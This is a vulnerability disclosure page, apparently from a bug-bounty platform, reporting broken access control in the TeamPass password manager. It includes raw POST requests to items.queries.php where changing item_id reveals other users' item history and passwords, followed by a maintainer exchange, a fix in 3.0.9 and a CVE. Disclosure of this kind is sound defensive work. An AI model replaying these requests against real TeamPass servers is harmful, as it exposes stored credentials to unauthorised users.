We've joined Protect AIJoin us over there for bounties up to $50,000+ for vulnerabilities in AI/ML repos

Broken Access Control On Item via ID in nilsteampassnet/teampass

Valid

Reported on

Apr 5th 2023

Description

By editing the ID on the request or HTML I can see some information of any item via ID

Proof of Concept

  1. Create two account with perrmission on two folder and set permission for each user. Example Image


Example Image

  1. Create item with each user Example Image


Example Image

  1. View detail a item and change item_id on request view history
POST /teampass/sources/items.queries.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 87
Origin: http://localhost
Connection: close
Referer: http://localhost/teampass/index.php?page=items
Cookie: 98306e16032402cd5ea3b7d8dd796e0630482672fbc73f91e2=9f1f0a5f7b487eea4da2d4c490ebe41ee75827a8f9da5b0c97; eid=2; download_started=0; PowerBB_username=tuanth; PowerBB_password=32298fc135b3fecf012a4c27efbba188; plupload_ui_view=thumbs; teampass_session=1c25dokujscfq8aj1qvp84a3ue; jstree_select=2
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

type=load_item_history&item_id=2&key=tMV9Z62V8X2VqVPz33sFP8mUEF7psK295Fhcy5JHEnkvvuMUyC



history for the item viewed from the permission of someone who have permission to the folder but this item
Example Image


history for the item viewed from the permission of someone who does not have permission to the folder but this item
Example Image

Impact

Can view the change history of any item, view the password for that item

Occurrences

Inspect HTML and change data-item-id="victim_id"

Example Image


Copy password Example Image


Copy password to clipboard and compare with password on item

POST /teampass/sources/items.queries.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 88
Origin: http://localhost
Connection: close
Referer: http://localhost/teampass/index.php?page=items
Cookie: 98306e16032402cd5ea3b7d8dd796e0630482672fbc73f91e2=a73c739e19c6877c4148b52f56cd2fda7bbc02dc2400017fb7; eid=2; download_started=0; PowerBB_username=tuanth; PowerBB_password=32298fc135b3fecf012a4c27efbba188; plupload_ui_view=thumbs; teampass_session=1c25dokujscfq8aj1qvp84a3ue; jstree_select=2
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

type=show_item_password&item_id=3&key=q6mU2yjxhjcSbT9kCs7XzMLskHvBdGPpBSNF38ZUHPpTh8dLx9
We are processing your report and will contact the nilsteampassnet/teampass team within 24 hours. 6 months ago
TuanTH modified the report
6 months ago
TuanTH modified the report
6 months ago
TuanTH modified the report
6 months ago
We have contacted a member of the nilsteampassnet/teampass team and are waiting to hear back 5 months ago
TuanTH
4 months ago

Researcher

hi @teampass do you have any update in this post?

Nils Laumaillé
4 months ago

Maintainer

hi @tht1997 Thank you for this. As the screen capture are very small and cannot make them bigger, I'm not sure to have the complete issue. But of what I have understood, by modifying the data-item-id directly from the console with an other item ID, the user can access the password. Is that correct? If yes, I could reproduce. Indeed, this is possible but the risk seems near to 0 to have someone doing this. IDs are never used in the form, and what can do a user only with a password if he has not url, no login, etc. ???? Nevertheless, I will fix this ;)

TuanTH
4 months ago

Researcher

hi @nilsteampassnet, By change item_id, I can read the information that the user does not belong to the user group is allowed

Nils Laumaillé validated this vulnerability 4 months ago
TuanTH has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Nils Laumaillé marked this as fixed in 3.0.9 with commit 774985 4 months ago
The fix bounty has been dropped
This vulnerability has been assigned a CVE
Nils Laumaillé published this vulnerability 4 months ago
items.queries.php#L4606-L4677 has been validated
items.queries.php#L4162-L4212 has been validated
items.queries.php#L6225-L6234 has been validated
Nils Laumaillé gave praise 4 months ago
Thank you
The researcher's credibility has slightly increased as a result of the maintainer's thanks: +1
to join this conversation